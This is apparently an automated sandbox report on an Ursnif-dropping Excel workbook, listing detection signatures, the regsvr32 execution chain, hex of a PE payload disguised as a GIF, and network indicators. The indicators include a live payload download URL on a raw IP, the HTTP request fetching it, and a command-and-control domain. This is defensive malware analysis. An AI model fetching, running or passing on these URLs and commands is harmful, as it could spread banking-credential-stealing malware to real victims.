
Analysis Report InformazioneGenerale.xlsb

Overview

General Information

Sample Name: InformazioneGenerale.xlsb
Analysis ID: 316010
MD5: 4dddb0320eac6050d6360c92c104d05c
SHA1: 816db7af62de3dc200b88357a5341c6ce184cc93
SHA256: ae87b82d817d363b159e072be2e2017dfe0bcf7fd3bc6a7c9dee0ff885eefc5f

Detection

Hidden Macro 4.0 Ursnif
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Document exploit detected (drops PE files)
Multi AV Scanner detection for domain / URL
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
System process connects to network (likely due to code injection or exploit)
Yara detected Ursnif
Creates a COM Internet Explorer object
Document exploit detected (UrlDownloadToFile)
Document exploit detected (process start blacklist hit)
Downloads files with wrong headers with respect to MIME Content-Type
Found Excel 4.0 Macro with suspicious formulas
Found abnormal large hidden Excel 4.0 Macro sheet
Found obfuscated Excel 4.0 Macro
Office process drops PE file
Sigma detected: Microsoft Office Product Spawning Windows Shell
Writes or reads registry keys via WMI
Writes registry values via WMI
Antivirus or Machine Learning detection for unpacked file
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Drops files with a non-matching file extension (content does not match file extension)
Found dropped PE file which has not been started or loaded
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Sample execution stops while process was sleeping (likely an evasion)
Tries to load missing DLLs
Uses code obfuscation techniques (call, push, ret)

Classification

Startup

  • System is w10x64
  • EXCEL.EXE (PID: 2100 cmdline: 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding MD5: 5D6638F2C8F8571C593999C58866007E)
    • regsvr32.exe (PID: 6220 cmdline: regsvr32 -s C:\ProgramData\Dori.ocx MD5: 426E7499F6A7346F0410DEAD0805586B)
  • iexplore.exe (PID: 6424 cmdline: 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding MD5: 6465CB92B25A7BC1DF8E01D8AC5E7596)
    • iexplore.exe (PID: 6480 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6424 CREDAT:17410 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
  • iexplore.exe (PID: 3652 cmdline: 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding MD5: 6465CB92B25A7BC1DF8E01D8AC5E7596)
    • iexplore.exe (PID: 5372 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:3652 CREDAT:17410 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
  • iexplore.exe (PID: 1180 cmdline: 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding MD5: 6465CB92B25A7BC1DF8E01D8AC5E7596)
    • iexplore.exe (PID: 6828 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:1180 CREDAT:17410 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
  • iexplore.exe (PID: 1084 cmdline: 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding MD5: 6465CB92B25A7BC1DF8E01D8AC5E7596)
    • iexplore.exe (PID: 3892 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:1084 CREDAT:17410 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
  • iexplore.exe (PID: 6688 cmdline: 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding MD5: 6465CB92B25A7BC1DF8E01D8AC5E7596)
    • iexplore.exe (PID: 1092 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6688 CREDAT:17410 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
  • iexplore.exe (PID: 6240 cmdline: 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding MD5: 6465CB92B25A7BC1DF8E01D8AC5E7596)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000001.00000003.229213427.00000000064F0000.00000004.00000040.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security |
00000001.00000003.230333485.00000000064F0000.00000004.00000040.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security |
00000001.00000003.230412465.00000000064F0000.00000004.00000040.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security |
00000001.00000003.230133784.00000000064F0000.00000004.00000040.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security |
00000001.00000003.230002994.00000000064F0000.00000004.00000040.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security |

            Sigma Overview

            System Summary:

            Sigma detected: Microsoft Office Product Spawning Windows Shell
            Source: Process started | Author: Michael Haag, Florian Roth, Markus Neis | Data: Command: regsvr32 -s C:\ProgramData\Dori.ocx, CommandLine: regsvr32 -s C:\ProgramData\Dori.ocx, CommandLine|base64offset|contains: ,, Image: C:\Windows\SysWOW64\regsvr32.exe, NewProcessName: C:\Windows\SysWOW64\regsvr32.exe, OriginalFileName: C:\Windows\SysWOW64\regsvr32.exe, ParentCommandLine: 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding, ParentImage: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE, ParentProcessId: 2100, ProcessCommandLine: regsvr32 -s C:\ProgramData\Dori.ocx, ProcessId: 6220

            Signature Overview


            AV Detection:

            Antivirus detection for URL or domain
            Source: http://45.138.72.84/10.11nov322.gif | Avira URL Cloud: Label: malware
            Multi AV Scanner detection for domain / URL
            Source: http://45.138.72.84/10.11nov322.gif | Virustotal: Detection: 8%
            Antivirus or Machine Learning detection for unpacked file
            Source: 1.2.regsvr32.exe.e40000.1.unpack | Avira: Label: TR/Patched.Ren.Gen

            Software Vulnerabilities:

            Document exploit detected (drops PE files)
            Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | File created: 10.11nov322[1].gif.0.dr
            Document exploit detected (UrlDownloadToFile)
            Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | Section loaded: unknown origin: URLDownloadToFileA
            Document exploit detected (process start blacklist hit)
            Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | Process created: C:\Windows\SysWOW64\regsvr32.exe

            Networking:

            Creates a COM Internet Explorer object
            Source: C:\Windows\SysWOW64\regsvr32.exe | Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}
            Source: C:\Windows\SysWOW64\regsvr32.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}
            Source: C:\Windows\SysWOW64\regsvr32.exe | Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\TreatAs
            Source: C:\Windows\SysWOW64\regsvr32.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\TreatAs
            Source: C:\Windows\SysWOW64\regsvr32.exe | Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocServer32
            Source: C:\Windows\SysWOW64\regsvr32.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocServer32
            Source: C:\Windows\SysWOW64\regsvr32.exe | Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocHandler32
            Source: C:\Windows\SysWOW64\regsvr32.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocHandler32
            Source: C:\Windows\SysWOW64\regsvr32.exe | Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocHandler
            Source: C:\Windows\SysWOW64\regsvr32.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocHandler
            Downloads files with wrong headers with respect to MIME Content-Type
            Source: httpImage file has PE prefix: HTTP/1.1 200 OK Date: Fri, 13 Nov 2020 13:07:40 GMT Server: Apache/2.4.29 (Ubuntu) Last-Modified: Fri, 13 Nov 2020 08:48:47 GMT ETag: "23400-5b3f918bfb9c0" Accept-Ranges: bytes Content-Length: 144384 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: image/gif Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 0e 83 98 e1 4a e2 f6 b2 4a e2 f6 b2 4a e2 f6 b2 a2 fd fd b2 4b e2 f6 b2 a2 fd fc b2 5c e2 f6 b2 c9 fe f8 b2 43 e2 f6 b2 43 9a 65 b2 48 e2 f6 b2 6d 24 8d b2 48 e2 f6 b2 89 ed ab b2 4f e2 f6 b2 4a e2 f7 b2 1c e2 f6 b2 43 9a 72 b2 4b e2 f6 b2 43 9a 64 b2 4b e2 f6 b2 54 b0 62 b2 4b e2 f6 b2 43 9a 67 b2 4b e2 f6 b2 52 69 63 68 4a e2 f6 b2 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 c3 a6 84 57 00 00 00 00 00 00 00 00 e0 00 1e 21 0b 01 09 00 00 6c 00 00 00 f2 01 00 00 00 00 00 e0 20 00 00 00 10 00 00 00 80 00 00 00 00 00 10 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 80 02 00 00 04 00 00 c2 ee 02 00 03 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 60 8d 00 00 4f 00 00 00 bc 85 00 00 64 00 00 00 00 50 02 00 60 1d 00 00 00 00 00 00 00 00 00 00 00 2c 02 00 00 08 00 00 00 70 02 00 34 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 68 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 d6 6b 00 00 00 10 00 00 00 6c 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 af 0d 00 00 00 80 00 00 00 0e 
00 00 00 70 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 a0 bd 01 00 00 90 00 00 00 88 01 00 00 7e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 60 1d 00 00 00 50 02 00 00 1e 00 00 00 06 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 68 06 00 00 00 70 02 00 00 08 00 00 00 24 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
            Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 13 Nov 2020 13:07:40 GMTServer: Apache/2.4.29 (Ubuntu)Last-Modified: Fri, 13 Nov 2020 08:48:47 GMTETag: "23400-5b3f918bfb9c0"Accept-Ranges: bytesContent-Length: 144384Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: image/gifData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 0e 83 98 e1 4a e2 f6 b2 4a e2 f6 b2 4a e2 f6 b2 a2 fd fd b2 4b e2 f6 b2 a2 fd fc b2 5c e2 f6 b2 c9 fe f8 b2 43 e2 f6 b2 43 9a 65 b2 48 e2 f6 b2 6d 24 8d b2 48 e2 f6 b2 89 ed ab b2 4f e2 f6 b2 4a e2 f7 b2 1c e2 f6 b2 43 9a 72 b2 4b e2 f6 b2 43 9a 64 b2 4b e2 f6 b2 54 b0 62 b2 4b e2 f6 b2 43 9a 67 b2 4b e2 f6 b2 52 69 63 68 4a e2 f6 b2 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 c3 a6 84 57 00 00 00 00 00 00 00 00 e0 00 1e 21 0b 01 09 00 00 6c 00 00 00 f2 01 00 00 00 00 00 e0 20 00 00 00 10 00 00 00 80 00 00 00 00 00 10 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 80 02 00 00 04 00 00 c2 ee 02 00 03 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 60 8d 00 00 4f 00 00 00 bc 85 00 00 64 00 00 00 00 50 02 00 60 1d 00 00 00 00 00 00 00 00 00 00 00 2c 02 00 00 08 00 00 00 70 02 00 34 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 68 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 d6 6b 00 00 00 10 00 00 00 6c 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 af 0d 00 00 00 80 00 00 00 0e 00 
00 00 70 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 a0 bd 01 00 00 90 00 00 00 88 01 00 00 7e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 60 1d 00 00 00 50 02 00 00 1e 00 00 00 06 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 68 06 00 00 00 70 02 00 00 08 00 00 00 24 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
            Source: Joe Sandbox View | JA3 fingerprint: 9e10692f1b7f78228b2d4e424db3a98c
            Source: Joe Sandbox View | JA3 fingerprint: ce5f3254611a8c095a3d821d44539877
            Source: unknown | TCP traffic detected without corresponding DNS query: 45.138.72.84
            Source: global traffic | HTTP traffic detected:
                GET /10.11nov322.gif HTTP/1.1
                Accept: */*
                Accept-Encoding: gzip, deflate
                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                Host: 45.138.72.84
                Connection: Keep-Alive
            Source: msapplication.xml0.5.dr | String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0x951d8fca,0x01d6ba09</date><accdate>0x951d8fca,0x01d6ba09</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.facebook.com (Facebook)
            Source: msapplication.xml0.5.dr | String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0x951d8fca,0x01d6ba09</date><accdate>0x951ff26c,0x01d6ba09</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Facebook.url"/></tile></msapplication></browserconfig> equals www.facebook.com (Facebook)
            Source: msapplication.xml5.5.dr | String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0x952254c7,0x01d6ba09</date><accdate>0x952254c7,0x01d6ba09</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.twitter.com (Twitter)
            Source: msapplication.xml5.5.dr | String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0x952254c7,0x01d6ba09</date><accdate>0x952254c7,0x01d6ba09</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Twitter.url"/></tile></msapplication></browserconfig> equals www.twitter.com (Twitter)
            Source: msapplication.xml7.5.dr | String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0x9524b70b,0x01d6ba09</date><accdate>0x9524b70b,0x01d6ba09</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.youtube.com (Youtube)
            Source: msapplication.xml7.5.dr | String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0x9524b70b,0x01d6ba09</date><accdate>0x9524b70b,0x01d6ba09</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Youtube.url"/></tile></msapplication></browserconfig> equals www.youtube.com (Youtube)
            Source: unknown | DNS traffic detected: queries for: bonderlas.xyz
            Source: regsvr32.exe, 00000001.00000003.230333485.00000000064F0000.00000004.00000040.sdmp | String found in binary or memory: http://%s=%s&file://&os=%u.%u_%u_%u_x%uindex.html;
            Source: sharedStrings.bin | String found in binary or memory: http://45.138.72.84/10.11nov322.gif
            Source: Dori.ocx.0.dr | String found in binary or memory: http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s
            Source: Dori.ocx.0.dr | String found in binary or memory: http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#
            Source: Dori.ocx.0.dr | String found in binary or memory: http://ocsp.sectigo.com0
            Source: msapplication.xml.5.dr | String found in binary or memory: http://www.amazon.com/
            Source: msapplication.xml1.5.dr | String found in binary or memory: http://www.google.com/
            Source: msapplication.xml2.5.dr | String found in binary or memory: http://www.live.com/
            Source: msapplication.xml3.5.dr | String found in binary or memory: http://www.nytimes.com/
            Source: msapplication.xml4.5.dr | String found in binary or memory: http://www.reddit.com/
            Source: msapplication.xml5.5.dr | String found in binary or memory: http://www.twitter.com/
            Source: msapplication.xml6.5.dr | String found in binary or memory: http://www.wikipedia.com/
            Source: msapplication.xml7.5.dr | String found in binary or memory: http://www.youtube.com/
            Source: regsvr32.exe, regsvr32.exe, 00000001.00000003.230333485.00000000064F0000.00000004.00000040.sdmp | String found in binary or memory: https://bonderlas.xyz
            Source: regsvr32.exe, 00000001.00000002.494838994.00000000064F0000.00000004.00000040.sdmp, ~DF4EEB7094F37C54EC.TMP.34.dr | String found in binary or memory: https://bonderlas.xyz/index.htm
            Source: {BE482461-25FC-11EB-90E4-ECF4BB862DED}.dat.5.dr | String found in binary or memory: https://bonderlas.xyz/index.htmRoot
            Source: {BE482461-25FC-11EB-90E4-ECF4BB862DED}.dat.5.dr | String found in binary or memory: https://bonderlas.xyz/index.htmindex.htm
            Source: regsvr32.exe, 00000001.00000003.230333485.00000000064F0000.00000004.00000040.sdmp | String found in binary or memory: https://bonderlas.xyzQ
            Source: Dori.ocx.0.dr | String found in binary or memory: https://sectigo.com/CPS0
            Source: 9B4411C4-B456-4DC4-842A-6F78846D9CB8.0.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/groups
            Source: 9B4411C4-B456-4DC4-842A-6F78846D9CB8.0.drString found in binary or memory: https://apis.live.net/v5.0/
            Source: 9B4411C4-B456-4DC4-842A-6F78846D9CB8.0.drString found in binary or memory: https://arc.msn.com/v4/api/selection
            Source: 9B4411C4-B456-4DC4-842A-6F78846D9CB8.0.drString found in binary or memory: https://asgsmsproxyapi.azurewebsites.net/
            Source: 9B4411C4-B456-4DC4-842A-6F78846D9CB8.0.drString found in binary or memory: https://augloop.office.com
            Source: 9B4411C4-B456-4DC4-842A-6F78846D9CB8.0.drString found in binary or memory: https://augloop.office.com/v2
            Source: 9B4411C4-B456-4DC4-842A-6F78846D9CB8.0.drString found in binary or memory: https://autodiscover-s.outlook.com
            Source: 9B4411C4-B456-4DC4-842A-6F78846D9CB8.0.drString found in binary or memory: https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml
            Source: regsvr32.exe, regsvr32.exe, 00000001.00000003.230333485.00000000064F0000.00000004.00000040.sdmpString found in binary or memory: https://bonderlas.xyz
            Source: regsvr32.exe, 00000001.00000002.494838994.00000000064F0000.00000004.00000040.sdmp, ~DF4EEB7094F37C54EC.TMP.34.drString found in binary or memory: https://bonderlas.xyz/index.htm
            Source: {BE482461-25FC-11EB-90E4-ECF4BB862DED}.dat.5.drString found in binary or memory: https://bonderlas.xyz/index.htmRoot
            Source: {BE482461-25FC-11EB-90E4-ECF4BB862DED}.dat.5.drString found in binary or memory: https://bonderlas.xyz/index.htmindex.htm
            Source: regsvr32.exe, 00000001.00000003.230333485.00000000064F0000.00000004.00000040.sdmpString found in binary or memory: https://bonderlas.xyzQ
            Source: 9B4411C4-B456-4DC4-842A-6F78846D9CB8.0.drString found in binary or memory: https://cdn.entity.
            Source: 9B4411C4-B456-4DC4-842A-6F78846D9CB8.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/stat/images/OneDriveUpsell.png
            Source: 9B4411C4-B456-4DC4-842A-6F78846D9CB8.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSignUpUpsell
            Source: 9B4411C4-B456-4DC4-842A-6F78846D9CB8.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSyncClientUpsell
            Source: 9B4411C4-B456-4DC4-842A-6F78846D9CB8.0.drString found in binary or memory: https://client-office365-tas.msedge.net/ab
            Source: 9B4411C4-B456-4DC4-842A-6F78846D9CB8.0.drString found in binary or memory: https://clients.config.office.net/
            Source: 9B4411C4-B456-4DC4-842A-6F78846D9CB8.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/android/policies
            Source: 9B4411C4-B456-4DC4-842A-6F78846D9CB8.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/ios
            Source: 9B4411C4-B456-4DC4-842A-6F78846D9CB8.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/mac
            Source: 9B4411C4-B456-4DC4-842A-6F78846D9CB8.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/tenantassociationkey
            Source: 9B4411C4-B456-4DC4-842A-6F78846D9CB8.0.drString found in binary or memory: https://cloudfiles.onenote.com/upload.aspx
            Source: 9B4411C4-B456-4DC4-842A-6F78846D9CB8.0.drString found in binary or memory: https://config.edge.skype.com
            Source: 9B4411C4-B456-4DC4-842A-6F78846D9CB8.0.drString found in binary or memory: https://config.edge.skype.com/config/v1/Office
            Source: 9B4411C4-B456-4DC4-842A-6F78846D9CB8.0.drString found in binary or memory: https://config.edge.skype.com/config/v2/Office
            Source: 9B4411C4-B456-4DC4-842A-6F78846D9CB8.0.drString found in binary or memory: https://cortana.ai
            Source: 9B4411C4-B456-4DC4-842A-6F78846D9CB8.0.drString found in binary or memory: https://cr.office.com
            Source: 9B4411C4-B456-4DC4-842A-6F78846D9CB8.0.drString found in binary or memory: https://dataservice.o365filtering.com
            Source: 9B4411C4-B456-4DC4-842A-6F78846D9CB8.0.drString found in binary or memory: https://dataservice.o365filtering.com/
            Source: 9B4411C4-B456-4DC4-842A-6F78846D9CB8.0.drString found in binary or memory: https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile
            Source: 9B4411C4-B456-4DC4-842A-6F78846D9CB8.0.drString found in binary or memory: https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
            Source: 9B4411C4-B456-4DC4-842A-6F78846D9CB8.0.drString found in binary or memory: https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies
            Source: 9B4411C4-B456-4DC4-842A-6F78846D9CB8.0.drString found in binary or memory: https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/
            Source: 9B4411C4-B456-4DC4-842A-6F78846D9CB8.0.drString found in binary or memory: https://dev0-api.acompli.net/autodetect
            Source: 9B4411C4-B456-4DC4-842A-6F78846D9CB8.0.drString found in binary or memory: https://devnull.onenote.com
            Source: 9B4411C4-B456-4DC4-842A-6F78846D9CB8.0.drString found in binary or memory: https://directory.services.
            Source: 9B4411C4-B456-4DC4-842A-6F78846D9CB8.0.drString found in binary or memory: https://ecs.office.com/config/v2/Office
            Source: 9B4411C4-B456-4DC4-842A-6F78846D9CB8.0.drString found in binary or memory: https://entitlement.diagnostics.office.com
            Source: 9B4411C4-B456-4DC4-842A-6F78846D9CB8.0.drString found in binary or memory: https://entitlement.diagnosticssdf.office.com
            Source: 9B4411C4-B456-4DC4-842A-6F78846D9CB8.0.drString found in binary or memory: https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
            Source: 9B4411C4-B456-4DC4-842A-6F78846D9CB8.0.drString found in binary or memory: https://excel.uservoice.com/forums/304936-excel-for-mobile-devices-tablets-phones-android
            Source: 9B4411C4-B456-4DC4-842A-6F78846D9CB8.0.drString found in binary or memory: https://globaldisco.crm.dynamics.com
            Source: 9B4411C4-B456-4DC4-842A-6F78846D9CB8.0.drString found in binary or memory: https://graph.ppe.windows.net
            Source: 9B4411C4-B456-4DC4-842A-6F78846D9CB8.0.drString found in binary or memory: https://graph.ppe.windows.net/
            Source: 9B4411C4-B456-4DC4-842A-6F78846D9CB8.0.drString found in binary or memory: https://graph.windows.net
            Source: 9B4411C4-B456-4DC4-842A-6F78846D9CB8.0.drString found in binary or memory: https://graph.windows.net/
            Source: 9B4411C4-B456-4DC4-842A-6F78846D9CB8.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/api/telemetry
            Source: 9B4411C4-B456-4DC4-842A-6F78846D9CB8.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?
            Source: 9B4411C4-B456-4DC4-842A-6F78846D9CB8.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?cp=remix3d
            Source: 9B4411C4-B456-4DC4-842A-6F78846D9CB8.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=icons&amp;premium=1
            Source: 9B4411C4-B456-4DC4-842A-6F78846D9CB8.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockimages&amp;premium=1
            Source: 9B4411C4-B456-4DC4-842A-6F78846D9CB8.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockvideos&amp;premium=1
            Source: 9B4411C4-B456-4DC4-842A-6F78846D9CB8.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsofticon?
            Source: 9B4411C4-B456-4DC4-842A-6F78846D9CB8.0.drString found in binary or memory: https://incidents.diagnostics.office.com
            Source: 9B4411C4-B456-4DC4-842A-6F78846D9CB8.0.drString found in binary or memory: https://incidents.diagnosticssdf.office.com
